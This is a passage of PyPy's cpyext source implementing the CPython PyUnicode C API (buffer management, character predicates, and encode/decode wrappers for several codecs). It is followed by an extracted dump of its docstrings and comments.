    CANNOT_FAIL, Py_ssize_t, build_type_checkers, cpython_api,
    bootstrap_function, PyObjectFields, cpython_struct, CONST_STRING,
    CONST_WSTRING)
from pypy.module.cpyext.pyerrors import PyErr_BadArgument
from pypy.module.cpyext.pyobject import (
    PyObject, PyObjectP, Py_DecRef, make_ref, from_ref, track_reference,
    make_typedescr, get_typedescr)
from pypy.module.cpyext.stringobject import PyString_Check
from pypy.module.sys.interp_encoding import setdefaultencoding
from pypy.objspace.std import unicodeobject, unicodetype, stringtype
from pypy.rlib import runicode
from pypy.tool.sourcetools import func_renamer
import sys

## See comment in stringobject.py.

# Mirror of CPython's PyUnicodeObject layout: the common PyObject header
# fields plus a raw wchar_t buffer and its length.
PyUnicodeObjectStruct = lltype.ForwardReference()
PyUnicodeObject = lltype.Ptr(PyUnicodeObjectStruct)
PyUnicodeObjectFields = (PyObjectFields +
    (("buffer", rffi.CWCHARP), ("size", Py_ssize_t)))
cpython_struct("PyUnicodeObject", PyUnicodeObjectFields, PyUnicodeObjectStruct)

@bootstrap_function
def init_unicodeobject(space):
    """Register the cpyext type descriptor for the unicode type."""
    make_typedescr(space.w_unicode.instancetypedef,
                   basestruct=PyUnicodeObject.TO,
                   attach=unicode_attach,
                   dealloc=unicode_dealloc,
                   realize=unicode_realize)

# Buffer for the default encoding (used by PyUnicode_GetDefaultEncoding)
DEFAULT_ENCODING_SIZE = 100
default_encoding = lltype.malloc(rffi.CCHARP.TO, DEFAULT_ENCODING_SIZE,
                                 flavor='raw', zero=True)

PyUnicode_Check, PyUnicode_CheckExact = build_type_checkers("Unicode", "w_unicode")

Py_UNICODE = lltype.UniChar

def new_empty_unicode(space, length):
    """
    Allocates a PyUnicodeObject and its buffer, but without a corresponding
    interpreter object.  The buffer may be mutated, until unicode_realize() is
    called.
    """
    typedescr = get_typedescr(space.w_unicode.instancetypedef)
    py_obj = typedescr.allocate(space, space.w_unicode)
    py_uni = rffi.cast(PyUnicodeObject, py_obj)

    # One extra slot so the buffer is always 0-terminated (zero=True fills it).
    buflen = length + 1
    py_uni.c_size = length
    py_uni.c_buffer = lltype.malloc(rffi.CWCHARP.TO, buflen,
                                    flavor='raw', zero=True)
    return py_uni

def unicode_attach(space, py_obj, w_obj):
    "Fills a newly allocated PyUnicodeObject with a unicode string"
    py_unicode = rffi.cast(PyUnicodeObject, py_obj)
    py_unicode.c_size = len(space.unicode_w(w_obj))
    # The buffer is materialized lazily, on the first PyUnicode_AS_UNICODE.
    py_unicode.c_buffer = lltype.nullptr(rffi.CWCHARP.TO)

def unicode_realize(space, py_obj):
    """
    Creates the unicode in the interpreter. The PyUnicodeObject buffer must not
    be modified after this call.
    """
    py_uni = rffi.cast(PyUnicodeObject, py_obj)
    s = rffi.wcharpsize2unicode(py_uni.c_buffer, py_uni.c_size)
    w_obj = space.wrap(s)
    track_reference(space, py_obj, w_obj)
    return w_obj

@cpython_api([PyObject], lltype.Void, external=False)
def unicode_dealloc(space, py_obj):
    # Free the raw wchar_t buffer (if it was ever materialized) before the
    # generic PyObject deallocation.
    py_unicode = rffi.cast(PyUnicodeObject, py_obj)
    if py_unicode.c_buffer:
        lltype.free(py_unicode.c_buffer, flavor="raw")
    from pypy.module.cpyext.object import PyObject_dealloc
    PyObject_dealloc(space, py_obj)

@cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL)
def Py_UNICODE_ISSPACE(space, ch):
    """Return 1 or 0 depending on whether ch is a whitespace character."""
    return unicodedb.isspace(ord(ch))

@cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL)
def Py_UNICODE_ISALPHA(space, ch):
    """Return 1 or 0 depending on whether ch is an alphabetic character."""
    return unicodedb.isalpha(ord(ch))

@cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL)
def Py_UNICODE_ISALNUM(space, ch):
    """Return 1 or 0 depending on whether ch is an alphanumeric character."""
    return unicodedb.isalnum(ord(ch))

@cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL)
def Py_UNICODE_ISLINEBREAK(space, ch):
    """Return 1 or 0 depending on whether ch is a linebreak character."""
    return unicodedb.islinebreak(ord(ch))
@cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISDECIMAL(space, ch): """Return 1 or 0 depending on whether ch is a decimal character.""" return unicodedb.isdecimal(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISDIGIT(space, ch): """Return 1 or 0 depending on whether ch is a digit character.""" return unicodedb.isdigit(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISNUMERIC(space, ch): """Return 1 or 0 depending on whether ch is a numeric character.""" return unicodedb.isnumeric(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISLOWER(space, ch): """Return 1 or 0 depending on whether ch is a lowercase character.""" return unicodedb.islower(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISUPPER(space, ch): """Return 1 or 0 depending on whether ch is an uppercase character.""" return unicodedb.isupper(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISTITLE(space, ch): """Return 1 or 0 depending on whether ch is a titlecase character.""" return unicodedb.istitle(ord(ch)) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOLOWER(space, ch): """Return the character ch converted to lower case.""" return unichr(unicodedb.tolower(ord(ch))) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOUPPER(space, ch): """Return the character ch converted to upper case.""" return unichr(unicodedb.toupper(ord(ch))) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOTITLE(space, ch): """Return the character ch converted to title case.""" return unichr(unicodedb.totitle(ord(ch))) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_TODECIMAL(space, ch): """Return the character ch converted to a decimal positive integer. Return -1 if this is not possible. 
This macro does not raise exceptions.""" try: return unicodedb.decimal(ord(ch)) except KeyError: return -1 @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_TODIGIT(space, ch): """Return the character ch converted to a single digit integer. Return -1 if this is not possible. This macro does not raise exceptions.""" try: return unicodedb.digit(ord(ch)) except KeyError: return -1 @cpython_api([Py_UNICODE], rffi.DOUBLE, error=CANNOT_FAIL) def Py_UNICODE_TONUMERIC(space, ch): """Return the character ch converted to a double. Return -1.0 if this is not possible. This macro does not raise exceptions.""" try: return unicodedb.numeric(ord(ch)) except KeyError: return -1.0 @cpython_api([], Py_UNICODE, error=CANNOT_FAIL) def PyUnicode_GetMax(space): """Get the maximum ordinal for a Unicode character.""" return runicode.UNICHR(runicode.MAXUNICODE) @cpython_api([PyObject], rffi.CCHARP, error=CANNOT_FAIL) def PyUnicode_AS_DATA(space, ref): """Return a pointer to the internal buffer of the object. o has to be a PyUnicodeObject (not checked).""" return rffi.cast(rffi.CCHARP, PyUnicode_AS_UNICODE(space, ref)) @cpython_api([PyObject], Py_ssize_t, error=CANNOT_FAIL) def PyUnicode_GET_DATA_SIZE(space, w_obj): """Return the size of the object's internal buffer in bytes. o has to be a PyUnicodeObject (not checked).""" return rffi.sizeof(lltype.UniChar) * PyUnicode_GET_SIZE(space, w_obj) @cpython_api([PyObject], Py_ssize_t, error=CANNOT_FAIL) def PyUnicode_GET_SIZE(space, w_obj): """Return the size of the object. o has to be a PyUnicodeObject (not checked).""" assert isinstance(w_obj, unicodeobject.W_UnicodeObject) return space.len_w(w_obj) @cpython_api([PyObject], rffi.CWCHARP, error=CANNOT_FAIL) def PyUnicode_AS_UNICODE(space, ref): """Return a pointer to the internal Py_UNICODE buffer of the object. 
ref has to be a PyUnicodeObject (not checked).""" ref_unicode = rffi.cast(PyUnicodeObject, ref) if not ref_unicode.c_buffer: # Copy unicode buffer w_unicode = from_ref(space, ref) u = space.unicode_w(w_unicode) ref_unicode.c_buffer = rffi.unicode2wcharp(u) return ref_unicode.c_buffer @cpython_api([PyObject], rffi.CWCHARP) def PyUnicode_AsUnicode(space, ref): """Return a read-only pointer to the Unicode object's internal Py_UNICODE buffer, NULL if unicode is not a Unicode object.""" # Don't use PyUnicode_Check, it will realize the object :-( w_type = from_ref(space, rffi.cast(PyObject, ref.c_ob_type)) if not space.is_true(space.issubtype(w_type, space.w_unicode)): raise OperationError(space.w_TypeError, space.wrap("expected unicode object")) return PyUnicode_AS_UNICODE(space, ref) @cpython_api([PyObject], Py_ssize_t, error=-1) def PyUnicode_GetSize(space, ref): if from_ref(space, rffi.cast(PyObject, ref.c_ob_type)) is space.w_unicode: ref = rffi.cast(PyUnicodeObject, ref) return ref.c_size else: w_obj = from_ref(space, ref) return space.len_w(w_obj) @cpython_api([PyUnicodeObject, rffi.CWCHARP, Py_ssize_t], Py_ssize_t, error=-1) def PyUnicode_AsWideChar(space, ref, buf, size): """Copy the Unicode object contents into the wchar_t buffer w. At most size wchar_t characters are copied (excluding a possibly trailing 0-termination character). Return the number of wchar_t characters copied or -1 in case of an error. Note that the resulting wchar_t string may or may not be 0-terminated. 
It is the responsibility of the caller to make sure that the wchar_t string is 0-terminated in case this is required by the application.""" c_buffer = PyUnicode_AS_UNICODE(space, rffi.cast(PyObject, ref)) c_size = ref.c_size # If possible, try to copy the 0-termination as well if size > c_size: size = c_size + 1 i = 0 while i < size: buf[i] = c_buffer[i] i += 1 if size > c_size: return c_size else: return size @cpython_api([], rffi.CCHARP, error=CANNOT_FAIL) def PyUnicode_GetDefaultEncoding(space): """Returns the currently active default encoding.""" if default_encoding[0] == '\x00': encoding = unicodetype.getdefaultencoding(space) i = 0 while i < len(encoding) and i < DEFAULT_ENCODING_SIZE: default_encoding[i] = encoding[i] i += 1 return default_encoding @cpython_api([CONST_STRING], rffi.INT_real, error=-1) def PyUnicode_SetDefaultEncoding(space, encoding): """Sets the currently active default encoding. Returns 0 on success, -1 in case of an error.""" w_encoding = space.wrap(rffi.charp2str(encoding)) setdefaultencoding(space, w_encoding) default_encoding[0] = '\x00' return 0 @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_AsEncodedObject(space, w_unicode, llencoding, llerrors): """Encode a Unicode object and return the result as Python object. encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) encoding = errors = None if llencoding: encoding = rffi.charp2str(llencoding) if llerrors: errors = rffi.charp2str(llerrors) return unicodetype.encode_object(space, w_unicode, encoding, errors) @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_AsEncodedString(space, w_unicode, llencoding, llerrors): """Encode a Unicode object and return the result as Python string object. 
encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" w_str = PyUnicode_AsEncodedObject(space, w_unicode, llencoding, llerrors) if not PyString_Check(space, w_str): raise OperationError(space.w_TypeError, space.wrap( "encoder did not return a string object")) return w_str @cpython_api([PyObject], PyObject) def PyUnicode_AsUnicodeEscapeString(space, w_unicode): """Encode a Unicode object using Unicode-Escape and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) return unicodetype.encode_object(space, w_unicode, 'unicode-escape', 'strict') @cpython_api([CONST_WSTRING, Py_ssize_t], PyObject) def PyUnicode_FromUnicode(space, wchar_p, length): """Create a Unicode Object from the Py_UNICODE buffer u of the given size. u may be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL.""" if wchar_p: s = rffi.wcharpsize2unicode(wchar_p, length) return make_ref(space, space.wrap(s)) else: return rffi.cast(PyObject, new_empty_unicode(space, length)) @cpython_api([CONST_WSTRING, Py_ssize_t], PyObject) def PyUnicode_FromWideChar(space, wchar_p, length): """Create a Unicode object from the wchar_t buffer w of the given size. 
Return NULL on failure.""" # PyPy supposes Py_UNICODE == wchar_t return PyUnicode_FromUnicode(space, wchar_p, length) @cpython_api([PyObject, CONST_STRING], PyObject) def _PyUnicode_AsDefaultEncodedString(space, w_unicode, errors): return PyUnicode_AsEncodedString(space, w_unicode, lltype.nullptr(rffi.CCHARP.TO), errors) @cpython_api([CONST_STRING, Py_ssize_t, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_Decode(space, s, size, encoding, errors): """Create a Unicode object by decoding size bytes of the encoded string s. encoding and errors have the same meaning as the parameters of the same name in the unicode() built-in function. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" w_str = space.wrap(rffi.charpsize2str(s, size)) w_encoding = space.wrap(rffi.charp2str(encoding)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_str, 'decode', w_encoding, w_errors) @cpython_api([PyObject], PyObject) def PyUnicode_FromObject(space, w_obj): """Shortcut for PyUnicode_FromEncodedObject(obj, NULL, "strict") which is used throughout the interpreter whenever coercion to Unicode is needed.""" if space.is_w(space.type(w_obj), space.w_unicode): return w_obj else: return space.call_function(space.w_unicode, w_obj) @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_FromEncodedObject(space, w_obj, encoding, errors): """Coerce an encoded object obj to an Unicode object and return a reference with incremented refcount. String and other char buffer compatible objects are decoded according to the given encoding and using the error handling defined by errors. Both can be NULL to have the interface use the default values (see the next section for details). 
All other objects, including Unicode objects, cause a TypeError to be set.""" w_encoding = space.wrap(rffi.charp2str(encoding)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None # - unicode is disallowed # - raise TypeError for non-string types if space.is_true(space.isinstance(w_obj, space.w_unicode)): w_meth = None else: try: w_meth = space.getattr(w_obj, space.wrap('decode')) except OperationError, e: if not e.match(space, space.w_AttributeError): raise w_meth = None if w_meth is None: raise OperationError(space.w_TypeError, space.wrap("decoding Unicode is not supported")) return space.call_function(w_meth, w_encoding, w_errors) @cpython_api([CONST_STRING], PyObject) def PyUnicode_FromString(space, s): """Create a Unicode object from an UTF-8 encoded null-terminated char buffer""" w_str = space.wrap(rffi.charp2str(s)) return space.call_method(w_str, 'decode', space.wrap("utf-8")) @cpython_api([CONST_STRING, Py_ssize_t], PyObject) def PyUnicode_FromStringAndSize(space, s, size): """Create a Unicode Object from the char buffer u. The bytes will be interpreted as being UTF-8 encoded. u may also be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL.""" if s: return make_ref(space, PyUnicode_DecodeUTF8( space, s, size, lltype.nullptr(rffi.CCHARP.TO))) else: return rffi.cast(PyObject, new_empty_unicode(space, size)) @cpython_api([rffi.INT_real], PyObject) def PyUnicode_FromOrdinal(space, ordinal): """Create a Unicode Object from the given Unicode code point ordinal. The ordinal must be in range(0x10000) on narrow Python builds (UCS2), and range(0x110000) on wide builds (UCS4). 
A ValueError is raised in case it is not.""" w_ordinal = space.wrap(rffi.cast(lltype.Signed, ordinal)) return space.call_function(space.builtin.get('unichr'), w_ordinal) @cpython_api([PyObjectP, Py_ssize_t], rffi.INT_real, error=-1) def PyUnicode_Resize(space, ref, newsize): # XXX always create a new string so far py_uni = rffi.cast(PyUnicodeObject, ref[0]) if not py_uni.c_buffer: raise OperationError(space.w_SystemError, space.wrap( "PyUnicode_Resize called on already created string")) try: py_newuni = new_empty_unicode(space, newsize) except MemoryError: Py_DecRef(space, ref[0]) ref[0] = lltype.nullptr(PyObject.TO) raise to_cp = newsize oldsize = py_uni.c_size if oldsize < newsize: to_cp = oldsize for i in range(to_cp): py_newuni.c_buffer[i] = py_uni.c_buffer[i] Py_DecRef(space, ref[0]) ref[0] = rffi.cast(PyObject, py_newuni) return 0 def make_conversion_functions(suffix, encoding): @cpython_api([PyObject], PyObject) @func_renamer('PyUnicode_As%sString' % suffix) def PyUnicode_AsXXXString(space, w_unicode): """Encode a Unicode object and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) return unicodetype.encode_object(space, w_unicode, encoding, "strict") @cpython_api([CONST_STRING, Py_ssize_t, CONST_STRING], PyObject) @func_renamer('PyUnicode_Decode%s' % suffix) def PyUnicode_DecodeXXX(space, s, size, errors): """Create a Unicode object by decoding size bytes of the encoded string s. Return NULL if an exception was raised by the codec. 
""" w_s = space.wrap(rffi.charpsize2str(s, size)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_s, 'decode', space.wrap(encoding), w_errors) globals()['PyUnicode_Decode%s' % suffix] = PyUnicode_DecodeXXX @cpython_api([CONST_WSTRING, Py_ssize_t, CONST_STRING], PyObject) @func_renamer('PyUnicode_Encode%s' % suffix) def PyUnicode_EncodeXXX(space, s, size, errors): """Encode the Py_UNICODE buffer of the given size and return a Python string object. Return NULL if an exception was raised by the codec.""" w_u = space.wrap(rffi.wcharpsize2unicode(s, size)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_u, 'encode', space.wrap(encoding), w_errors) globals()['PyUnicode_Encode%s' % suffix] = PyUnicode_EncodeXXX make_conversion_functions('UTF8', 'utf-8') make_conversion_functions('ASCII', 'ascii') make_conversion_functions('Latin1', 'latin-1') if sys.platform == 'win32': make_conversion_functions('MBCS', 'mbcs') @cpython_api([rffi.CCHARP, Py_ssize_t, rffi.CCHARP, rffi.INTP], PyObject) def PyUnicode_DecodeUTF16(space, s, size, llerrors, pbyteorder): """Decode length bytes from a UTF-16 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first two bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output (where it will result in either a \ufeff or a \ufffe character). After completion, *byteorder is set to the current byte order at the end of input data. 
If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec.""" string = rffi.charpsize2str(s, size) if pbyteorder is not None: llbyteorder = rffi.cast(lltype.Signed, pbyteorder[0]) if llbyteorder < 0: byteorder = "little" elif llbyteorder > 0: byteorder = "big" else: byteorder = "native" else: byteorder = "native" if llerrors: errors = rffi.charp2str(llerrors) else: errors = None result, length, byteorder = runicode.str_decode_utf_16_helper( string, size, errors, True, # final ? false for multiple passes? None, # errorhandler byteorder) if pbyteorder is not None: pbyteorder[0] = rffi.cast(rffi.INT, byteorder) return space.wrap(result) @cpython_api([rffi.CCHARP, Py_ssize_t, rffi.CCHARP, rffi.INTP], PyObject) def PyUnicode_DecodeUTF32(space, s, size, llerrors, pbyteorder): """Decode length bytes from a UTF-32 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first four bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output. After completion, *byteorder is set to the current byte order at the end of input data. In a narrow build codepoints outside the BMP will be decoded as surrogate pairs. If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec. 
""" string = rffi.charpsize2str(s, size) if pbyteorder: llbyteorder = rffi.cast(lltype.Signed, pbyteorder[0]) if llbyteorder < 0: byteorder = "little" elif llbyteorder > 0: byteorder = "big" else: byteorder = "native" else: byteorder = "native" if llerrors: errors = rffi.charp2str(llerrors) else: errors = None result, length, byteorder = runicode.str_decode_utf_32_helper( string, size, errors, True, # final ? false for multiple passes? None, # errorhandler byteorder) if pbyteorder is not None: pbyteorder[0] = rffi.cast(rffi.INT, byteorder) return space.wrap(result) @cpython_api([PyObject, PyObject], rffi.INT_real, error=-2) def PyUnicode_Compare(space, w_left, w_right): """Compare two strings and return -1, 0, 1 for less than, equal, and greater than, respectively.""" return space.int_w(space.cmp(w_left, w_right)) @cpython_api([rffi.CWCHARP, rffi.CWCHARP, Py_ssize_t], lltype.Void) def Py_UNICODE_COPY(space, target, source, length): """Roughly equivalent to memcpy() only the base size is Py_UNICODE copies sizeof(Py_UNICODE) * length bytes from source to target""" for i in range(0, length): target[i] = source[i] @cpython_api([PyObject, PyObject], PyObject) def PyUnicode_Format(space, w_format, w_args): """Return a new string object from format and args; this is analogous to format % args. The args argument must be a tuple.""" return space.mod(w_format, w_args) @cpython_api([PyObject, PyObject], PyObject) def PyUnicode_Join(space, w_sep, w_seq): """Join a sequence of strings using the given separator and return the resulting Unicode string.""" return space.call_method(w_sep, 'join', w_seq) @cpython_api([PyObject, PyObject, PyObject, Py_ssize_t], PyObject) def PyUnicode_Replace(space, w_str, w_substr, w_replstr, maxcount): """Replace at most maxcount occurrences of substr in str with replstr and return the resulting Unicode object. 
maxcount == -1 means replace all occurrences.""" return space.call_method(w_str, "replace", w_substr, w_replstr, space.wrap(maxcount)) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t, rffi.INT_real], rffi.INT_real, error=-1) def PyUnicode_Tailmatch(space, w_str, w_substr, start, end, direction): """Return 1 if substr matches str[start:end] at the given tail end (direction == -1 means to do a prefix match, direction == 1 a suffix match), 0 otherwise. Return -1 if an error occurred.""" str = space.unicode_w(w_str) substr = space.unicode_w(w_substr) if rffi.cast(lltype.Signed, direction) <= 0: return stringtype.stringstartswith(str, substr, start, end) else: return stringtype.stringendswith(str, substr, start, end) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t], Py_ssize_t, error=-1) def PyUnicode_Count(space, w_str, w_substr, start, end): """Return the number of non-overlapping occurrences of substr in str[start:end]. Return -1 if an error occurred.""" w_count = space.call_method(w_str, "count", w_substr, space.wrap(start), space.wrap(end)) return space.int_w(w_count) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t, rffi.INT_real], Py_ssize_t, error=-2) def PyUnicode_Find(space, w_str, w_substr, start, end, direction): """Return the first position of substr in str*[*start:end] using the given direction (direction == 1 means to do a forward search, direction == -1 a backward search). 
The return value is the index of the first match; a value of -1 indicates that no match was found, and -2 indicates that an error occurred and an exception has been set.""" if rffi.cast(lltype.Signed, direction) > 0: w_pos = space.call_method(w_str, "find", w_substr, space.wrap(start), space.wrap(end)) else: w_pos = space.call_method(w_str, "rfind", w_substr, space.wrap(start), space.wrap(end)) return space.int_w(w_pos) @cpython_api([PyObject, PyObject, Py_ssize_t], PyObject) def PyUnicode_Split(space, w_str, w_sep, maxsplit): """Split a string giving a list of Unicode strings. If sep is NULL, splitting will be done at all whitespace substrings. Otherwise, splits occur at the given separator. At most maxsplit splits will be done. If negative, no limit is set. Separators are not included in the resulting list.""" if w_sep is None: w_sep = space.w_None return space.call_method(w_str, "split", w_sep, space.wrap(maxsplit)) @cpython_api([PyObject, rffi.INT_real], PyObject) def PyUnicode_Splitlines(space, w_str, keepend): """Split a Unicode string at line breaks, returning a list of Unicode strings. CRLF is considered to be one line break. If keepend is 0, the Line break characters are not included in the resulting strings.""" return space.call_method(w_str, "splitlines", space.wrap(keepend))
en
0.790604
## See comment in stringobject.py. # Buffer for the default encoding (used by PyUnicde_GetDefaultEncoding) Allocatse a PyUnicodeObject and its buffer, but without a corresponding interpreter object. The buffer may be mutated, until unicode_realize() is called. Creates the unicode in the interpreter. The PyUnicodeObject buffer must not be modified after this call. Return 1 or 0 depending on whether ch is a whitespace character. Return 1 or 0 depending on whether ch is an alphabetic character. Return 1 or 0 depending on whether ch is an alphanumeric character. Return 1 or 0 depending on whether ch is a linebreak character. Return 1 or 0 depending on whether ch is a decimal character. Return 1 or 0 depending on whether ch is a digit character. Return 1 or 0 depending on whether ch is a numeric character. Return 1 or 0 depending on whether ch is a lowercase character. Return 1 or 0 depending on whether ch is an uppercase character. Return 1 or 0 depending on whether ch is a titlecase character. Return the character ch converted to lower case. Return the character ch converted to upper case. Return the character ch converted to title case. Return the character ch converted to a decimal positive integer. Return -1 if this is not possible. This macro does not raise exceptions. Return the character ch converted to a single digit integer. Return -1 if this is not possible. This macro does not raise exceptions. Return the character ch converted to a double. Return -1.0 if this is not possible. This macro does not raise exceptions. Get the maximum ordinal for a Unicode character. Return a pointer to the internal buffer of the object. o has to be a PyUnicodeObject (not checked). Return the size of the object's internal buffer in bytes. o has to be a PyUnicodeObject (not checked). Return the size of the object. o has to be a PyUnicodeObject (not checked). Return a pointer to the internal Py_UNICODE buffer of the object. ref has to be a PyUnicodeObject (not checked). 
# Copy unicode buffer Return a read-only pointer to the Unicode object's internal Py_UNICODE buffer, NULL if unicode is not a Unicode object. # Don't use PyUnicode_Check, it will realize the object :-( Copy the Unicode object contents into the wchar_t buffer w. At most size wchar_t characters are copied (excluding a possibly trailing 0-termination character). Return the number of wchar_t characters copied or -1 in case of an error. Note that the resulting wchar_t string may or may not be 0-terminated. It is the responsibility of the caller to make sure that the wchar_t string is 0-terminated in case this is required by the application. # If possible, try to copy the 0-termination as well Returns the currently active default encoding. Sets the currently active default encoding. Returns 0 on success, -1 in case of an error. Encode a Unicode object and return the result as Python object. encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec. Encode a Unicode object and return the result as Python string object. encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec. Encode a Unicode object using Unicode-Escape and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec. Create a Unicode Object from the Py_UNICODE buffer u of the given size. u may be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL. 
Create a Unicode object from the wchar_t buffer w of the given size. Return NULL on failure. # PyPy supposes Py_UNICODE == wchar_t Create a Unicode object by decoding size bytes of the encoded string s. encoding and errors have the same meaning as the parameters of the same name in the unicode() built-in function. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec. Shortcut for PyUnicode_FromEncodedObject(obj, NULL, "strict") which is used throughout the interpreter whenever coercion to Unicode is needed. Coerce an encoded object obj to an Unicode object and return a reference with incremented refcount. String and other char buffer compatible objects are decoded according to the given encoding and using the error handling defined by errors. Both can be NULL to have the interface use the default values (see the next section for details). All other objects, including Unicode objects, cause a TypeError to be set. # - unicode is disallowed # - raise TypeError for non-string types Create a Unicode object from an UTF-8 encoded null-terminated char buffer Create a Unicode Object from the char buffer u. The bytes will be interpreted as being UTF-8 encoded. u may also be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL. Create a Unicode Object from the given Unicode code point ordinal. The ordinal must be in range(0x10000) on narrow Python builds (UCS2), and range(0x110000) on wide builds (UCS4). A ValueError is raised in case it is not. # XXX always create a new string so far Encode a Unicode object and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec. 
Create a Unicode object by decoding size bytes of the encoded string s. Return NULL if an exception was raised by the codec. Encode the Py_UNICODE buffer of the given size and return a Python string object. Return NULL if an exception was raised by the codec. Decode length bytes from a UTF-16 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first two bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output (where it will result in either a \ufeff or a \ufffe character). After completion, *byteorder is set to the current byte order at the end of input data. If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec. # final ? false for multiple passes? # errorhandler Decode length bytes from a UTF-32 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first four bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output. After completion, *byteorder is set to the current byte order at the end of input data. In a narrow build codepoints outside the BMP will be decoded as surrogate pairs. 
